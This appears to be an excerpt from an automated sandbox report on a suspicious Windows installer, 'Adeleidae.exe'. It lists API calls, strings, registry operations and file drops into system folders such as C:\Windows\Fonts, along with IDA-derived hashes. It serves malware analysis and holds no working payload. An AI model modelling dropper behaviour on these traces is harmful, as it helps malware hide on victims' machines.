lstrcatW.KERNEL32(1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\Adeleidae.exe"), ref: 0040391F
lstrlenW.KERNEL32(Space required: ,?,?,?,Space required: ,00000000,C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74DF3420), ref: 0040399F
lstrcmpiW.KERNEL32(?,.exe,Space required: ,?,?,?,Space required: ,00000000,C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 004039B2
GetFileAttributesW.KERNEL32(Space required: ), ref: 004039BD
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes), ref: 00403A06
RegisterClassW.USER32(00433EA0), ref: 00403A43
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A5B
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A90
ShowWindow.USER32(00000005,00000000), ref: 00403AC6
GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403AF2
GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403AFF
RegisterClassW.USER32(00433EA0), ref: 00403B08
DialogBoxParamW.USER32(?,00000000,00403C41,00000000), ref: 00403B27

Strings

.DEFAULT\Control Panel\International, xrefs: 0040390A
RichEdit20W, xrefs: 00403AEA, 00403AF0
"C:\Users\user\Desktop\Adeleidae.exe", xrefs: 004038A1
RichEd20, xrefs: 00403ACC
_Nb, xrefs: 00403A22, 00403A8A
C:\Users\user\AppData\Local\Temp\, xrefs: 004038A3
.exe, xrefs: 004039AC
Control Panel\Desktop\ResourceLocale, xrefs: 004038D2
C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes, xrefs: 0040392E, 00403936, 004039D9, 004039DF, 004039EF
1033, xrefs: 004038BE, 0040391A
RichEdit, xrefs: 00403AF9
Space required: , xrefs: 00403966, 0040396F, 0040397D, 004039CC, 004039D2
RichEd32, xrefs: 00403ADA

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\Adeleidae.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$Space required: $_Nb
API String ID: 606308-4142090846
Opcode ID: 1b384d1f77ad73b90eb4ead2ce7446fbf64eb66176232e5d4eff2d39ff252f29
Instruction ID: 3415ad5ee5f1eed3d2c0e447cb4c4d8a0153f3b0974deb3f023f39c7f2583bdf
Opcode Fuzzy Hash: 1b384d1f77ad73b90eb4ead2ce7446fbf64eb66176232e5d4eff2d39ff252f29
Instruction Fuzzy Hash: A361CA706406006FD320AF66AD46F2B3A6CEB8474AF40553FF941B22E2DB7D5D41CA2D

Function 00402DEE Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402DFF
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Adeleidae.exe,00000400,?,?,00000000,0040353A,?), ref: 00402E1B

Part of subcall function 00405C2A: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\Adeleidae.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
Part of subcall function 00405C2A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50

GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Adeleidae.exe,C:\Users\user\Desktop\Adeleidae.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00402E67

Strings

(*B, xrefs: 00402E7C
Inst, xrefs: 00402ED3
C:\Users\user\Desktop\Adeleidae.exe, xrefs: 00402E05, 00402E14, 00402E28, 00402E48
"C:\Users\user\Desktop\Adeleidae.exe", xrefs: 00402DF4
soft, xrefs: 00402EDC
C:\Users\user\AppData\Local\Temp\, xrefs: 00402DF5
C:\Users\user\Desktop, xrefs: 00402E49, 00402E4E, 00402E54
Null, xrefs: 00402EE5
Error launching installer, xrefs: 00402E3E
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402FC6

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\Adeleidae.exe"$(*B$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Adeleidae.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-340574977
Opcode ID: 4e6222d9f8d31f850ab2b6b3c84cade23aa30136a505619e7e62f3ee6ab772f2
Instruction ID: 7d4f9fc7c678da67c97c1a1890296b71ec8e814f853b941ab64c238268a70fe9
Opcode Fuzzy Hash: 4e6222d9f8d31f850ab2b6b3c84cade23aa30136a505619e7e62f3ee6ab772f2
Instruction Fuzzy Hash: AF51F731904205ABDB209F61DE89B9F7BB8EB44394F14403BF904B62C1C7B89D409BAD

Function 00401767 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,C:\Windows\Fonts\sipunculid.gra,C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes,?,?,00000031), ref: 004017A8
CompareFileTime.KERNEL32(-00000014,?,C:\Windows\Fonts\sipunculid.gra,C:\Windows\Fonts\sipunculid.gra,00000000,00000000,C:\Windows\Fonts\sipunculid.gra,C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes,?,?,00000031), ref: 004017CD

Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062

Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D8A2,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D8A2,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D8A2,74DF23A0), ref: 0040520F
Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F

Strings

C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes, xrefs: 00401796
Copy to C:\Users\Public\Desktop\Bardehvalers.unw, xrefs: 00401819, 00401837
C:\Windows\resources\0809\gildes.lak, xrefs: 0040182D, 00401849
C:\Windows\Fonts\sipunculid.gra, xrefs: 00401785, 0040178E, 0040179B, 004017AD, 004017B9, 004017EF, 00401805, 00401823, 0040185F, 004018E0, 004018E9, 004018F3, 004018FE

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes$C:\Windows\Fonts\sipunculid.gra$C:\Windows\resources\0809\gildes.lak$Copy to C:\Users\Public\Desktop\Bardehvalers.unw
API String ID: 1941528284-3344457864
Opcode ID: 7eb387cec2b929145506f0f371aad0ef0a8c00339c8b79c916bd0341b2f4fd7b
Instruction ID: 02e4f6238df89927c362e8fae2a75ca1a565c16d749b69ec27d3a85cbadddcd8
Opcode Fuzzy Hash: 7eb387cec2b929145506f0f371aad0ef0a8c00339c8b79c916bd0341b2f4fd7b
Instruction Fuzzy Hash: 0941B631900515BACF11BFB5CC45EAF7679EF05328B24423BF522B10E1DB3C86519A6D

Function 00403027 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403091
GetTickCount.KERNEL32 ref: 00403138
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403161
wsprintfW.USER32 ref: 00403174

Strings

jA, xrefs: 004031F1
... %d%%, xrefs: 0040316E
jA, xrefs: 004030E7

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: jA$ jA$... %d%%
API String ID: 551687249-2167919867
Opcode ID: d6d85bbee09884fc6a4e27a5c727532f93391e72c67541d57332e7913648c049
Instruction ID: 9abceb1f43df10d1a821086e1d45a58eca4464abfa5f2a46825b956852eb5d51
Opcode Fuzzy Hash: d6d85bbee09884fc6a4e27a5c727532f93391e72c67541d57332e7913648c049
Instruction Fuzzy Hash: AF517C71901259EBDB10CF65DA44BAE7BB8AF05766F10417FF811B62C0C7789E40CBAA

Function 0040237B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
lstrlenW.KERNEL32(Copy to C:\Users\Public\Desktop\Bardehvalers.unw,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
RegSetValueExW.KERNELBASE(?,?,?,?,Copy to C:\Users\Public\Desktop\Bardehvalers.unw,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
RegCloseKey.ADVAPI32(?,?,?,Copy to C:\Users\Public\Desktop\Bardehvalers.unw,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6

Strings

Copy to C:\Users\Public\Desktop\Bardehvalers.unw, xrefs: 004023CA, 004023D8, 004023EF, 004023FF, 0040240A

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: Copy to C:\Users\Public\Desktop\Bardehvalers.unw
API String ID: 1356686001-2199123339
Opcode ID: 8d1fa541b4be6473b4eebec5251f87ec0d75fe525894c7cf72dd691243c30abf
Instruction ID: e0a93677b1043ce4e8fea40acd1fa81b7363c56b112b112c42ce1ea238d19e9d
Opcode Fuzzy Hash: 8d1fa541b4be6473b4eebec5251f87ec0d75fe525894c7cf72dd691243c30abf
Instruction Fuzzy Hash: 87118E71A00108BFEB10AFA5DE89EAEB67DEB44358F11403AF904B61D1D7B85E409668

Function 00405683 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056C6
GetLastError.KERNEL32 ref: 004056DA
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EF
GetLastError.KERNEL32 ref: 004056F9

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004056A9

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3449924974-3081826266
Opcode ID: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
Instruction ID: b9d54522e8c2a6a11acfe34e4faeeda892d25e5cd719c7a25251d408d6c76708
Opcode Fuzzy Hash: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
Instruction Fuzzy Hash: C8011A71D00619DBDF009FA0CA487EFBBB8EF14315F50443AD549B6190E7799604CFA9

Function 00402BFF Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402C20
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
RegCloseKey.ADVAPI32(?), ref: 00402C65
RegCloseKey.ADVAPI32(?), ref: 00402C8A
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 2ab96bb9c8b0da62a7224089158166dac983fcd7cb36fe929a5c9b4a96f383ba
Instruction ID: 923876515d334741f157c0c1a16b9ae25b0374e488e2a62f99a19aca1c1d50f8
Opcode Fuzzy Hash: 2ab96bb9c8b0da62a7224089158166dac983fcd7cb36fe929a5c9b4a96f383ba
Instruction Fuzzy Hash: 4B116A71504119BFEF10AF90DF8CEAE7B79FB54384B10003AF905A11A0D7B49E55AA28

Function 00401BDF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57

Strings

!, xrefs: 00401C13

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
Instruction ID: e3aefc4fd96fc6be6e01b9b250019d2d880820bae5141952ee5ed295407643d5
Opcode Fuzzy Hash: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
Instruction Fuzzy Hash: DA219071940209BEEF01AFB4CE4AABE7B75EB44344F10403EF601B61D1D6B89A409B68

Function 00405B11 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062

Part of subcall function 00405AB4: CharNextW.USER32(?,?,C:\,0040A300,00405B28,C:\,C:\,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Adeleidae.exe"), ref: 00405AC2
Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405AC7
Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405ADF

lstrlenW.KERNEL32(C:\,00000000,C:\,C:\,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Adeleidae.exe"), ref: 00405B6A
GetFileAttributesW.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405B7A

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405B11
C:\, xrefs: 00405B17, 00405B1C, 00405B22, 00405B63, 00405B69, 00405B71, 00405B79

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\$C:\Users\user\AppData\Local\Temp\
API String ID: 3248276644-3049482934
Opcode ID: c6e1c51320233fe3a8d28f86eff4fa9f75d9a909d4c49901629be8da40a5a1bd
Instruction ID: 9ab821bc962df094d04e13ee53e7cef05d0bc350337be3d6547239d71e0b1b07
Opcode Fuzzy Hash: c6e1c51320233fe3a8d28f86eff4fa9f75d9a909d4c49901629be8da40a5a1bd
Instruction Fuzzy Hash: FFF0A429504E5115D72272361D49EBF3669CF86324B1A063FF852B22D1DB3CB952CCBD

Function 00405F22 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Space required: ,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Space required: ,?), ref: 00405F4C
RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Space required: ,?), ref: 00405F6D
RegCloseKey.ADVAPI32(?,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Space required: ,?), ref: 00405F90

Strings

Space required: , xrefs: 00405F25

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Space required:
API String ID: 3677997916-1411000802
Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
Instruction ID: 7b18913d2a4f7d1a63d21b64be8b0843a819b9ea39c2317e7442ba644687e02f
Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
Instruction Fuzzy Hash: 1801483110060AAECB218F66ED08EAB3BA8EF94350F01402AFD44D2260D734D964CBA5

Function 00405C59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405C77
